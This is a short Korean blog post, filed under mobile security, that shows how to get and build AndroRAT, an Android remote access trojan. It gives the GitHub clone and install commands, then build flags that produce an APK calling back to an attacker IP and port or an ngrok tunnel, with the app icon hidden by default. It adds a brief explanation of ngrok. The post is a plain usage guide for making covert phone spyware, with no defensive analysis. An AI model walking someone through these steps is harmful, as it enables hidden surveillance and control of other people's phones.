🔒정보보안/모바일 보안
모바일 해킹 - 안드로이드 RAT(AndroRAT)
Janger
2022. 8. 23. 14:21
728x90
다운로드 및 깃허브 주소
https://github.com/karma9874/AndroRAT
GitHub - karma9874/AndroRAT: A Simple android remote administration tool using sockets. It uses java on the client side and pyth
A Simple android remote administration tool using sockets. It uses java on the client side and python on the server side - GitHub - karma9874/AndroRAT: A Simple android remote administration tool u...
github.com
설치
git clone https://github.com/karma9874/AndroRAT.git
cd AndroRAT
pip install -r requirements.txt
빌드
Usage:
python3 androRAT.py --build --ngrok [flags]
Flags:
-p, --port Attacker port number (optional by default its set to 8000)
-o, --output Name for the apk file (optional by default its set to "karma.apk")
-icon, --icon Visible icon after installing apk (by default set to hidden)
Usage:
python3 androRAT.py --build [flags]
Flags:
-i, --ip Attacker IP address (required)
-p, --port Attacker port number (required)
-o, --output Name for the apk file (optional)
-icon, --icon Visible icon after installing apk (by default set to hidden)
ngrok이란?
로컬(eg. localhost, 127.0.0.1)에서 개발한 소프트웨어를 쉽게 외부 인터넷으로 노출시켜주는 툴이다.
관련 참고글:
https://www.lesstif.com/software-architect/ngrok-39126236.html
참고 영상
728x90